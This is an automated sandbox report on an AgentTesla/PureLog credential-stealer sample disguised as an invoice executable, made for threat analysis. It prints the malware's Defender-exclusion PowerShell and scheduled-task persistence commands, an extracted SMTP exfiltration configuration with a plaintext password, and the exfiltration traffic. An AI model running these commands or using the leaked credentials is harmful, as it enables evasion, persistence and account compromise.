Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Proforma Invoice.exe

Overview

General Information

Sample name:Proforma Invoice.exe
Analysis ID:1399273
MD5:b774ca62d4f7e4a8359a40c7cad50ddb
SHA1:09467ea941b0c2c65cf908419847a7b3f948cc44
SHA256:b9008d07600af358e885fe396b52bbc6efbc135f7010e6aa6849c3af952dd9fb
Tags:AgentTeslaexeInvoice
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Proforma Invoice.exe (PID: 6412 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)
    • powershell.exe (PID: 6764 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2004 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7516 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7220 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Proforma Invoice.exe (PID: 7372 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)
  • VoAlKljQu.exe (PID: 7492 cmdline: C:\Users\user\AppData\Roaming\VoAlKljQu.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)
    • schtasks.exe (PID: 7712 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VoAlKljQu.exe (PID: 7764 cmdline: C:\Users\user\AppData\Roaming\VoAlKljQu.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 26 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Proforma Invoice.exe.3599970.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.Proforma Invoice.exe.25d0894.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Proforma Invoice.exe.3599970.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Proforma Invoice.exe.25c087c.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.Proforma Invoice.exe.5080000.12.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 34 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, ProcessId: 6764, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, ProcessId: 6764, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VoAlKljQu.exe, ParentImage: C:\Users\user\AppData\Roaming\VoAlKljQu.exe, ParentProcessId: 7492, ParentProcessName: VoAlKljQu.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp, ProcessId: 7712, ProcessName: schtasks.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Proforma Invoice.exe, Initiated: true, ProcessId: 7372, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, ProcessId: 7220, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, ProcessId: 6764, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, ProcessId: 7220, ProcessName: schtasks.exe
                        Timestamp:02/27/24-08:27:06.420135
                        SID:2851779
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:03.102734
                        SID:2855542
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:03.102734
                        SID:2855245
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:03.102734
                        SID:2840032
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:06.420135
                        SID:2855542
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:06.420135
                        SID:2855245
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:06.420135
                        SID:2840032
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:06.420071
                        SID:2030171
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:03.102734
                        SID:2030171
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-08:27:03.102734
                        SID:2851779
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeVirustotal: Detection: 65%Perma Link
                        Source: Proforma Invoice.exeReversingLabs: Detection: 63%
                        Source: Proforma Invoice.exeVirustotal: Detection: 65%Perma Link
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeJoe Sandbox ML: detected
                        Source: Proforma Invoice.exeJoe Sandbox ML: detected
                        Source: Proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: Proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4x nop then jmp 050BCADCh0_2_050BCE00
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 4x nop then jmp 0717BDC4h9_2_0717C0E8

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: Joe Sandbox ViewIP Address: 50.87.139.143 50.87.139.143
                        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficTCP traffic: 192.168.2.4:49736 -> 50.87.139.143:587
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ipify.org
                        Source: Proforma Invoice.exe, VoAlKljQu.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                        Source: Proforma Invoice.exe, VoAlKljQu.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                        Source: Proforma Invoice.exe, 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elec-qatar.com
                        Source: Proforma Invoice.exe, VoAlKljQu.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                        Source: Proforma Invoice.exe, 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4090730561.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: Proforma Invoice.exe, VoAlKljQu.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, K6jmfEUYzg.cs.Net Code: aft6g33EiG
                        Source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, K6jmfEUYzg.cs.Net Code: aft6g33EiG
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWindow created: window name: CLIPBRDWNDCLASS

                        System Summary

                        barindex
                        Source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
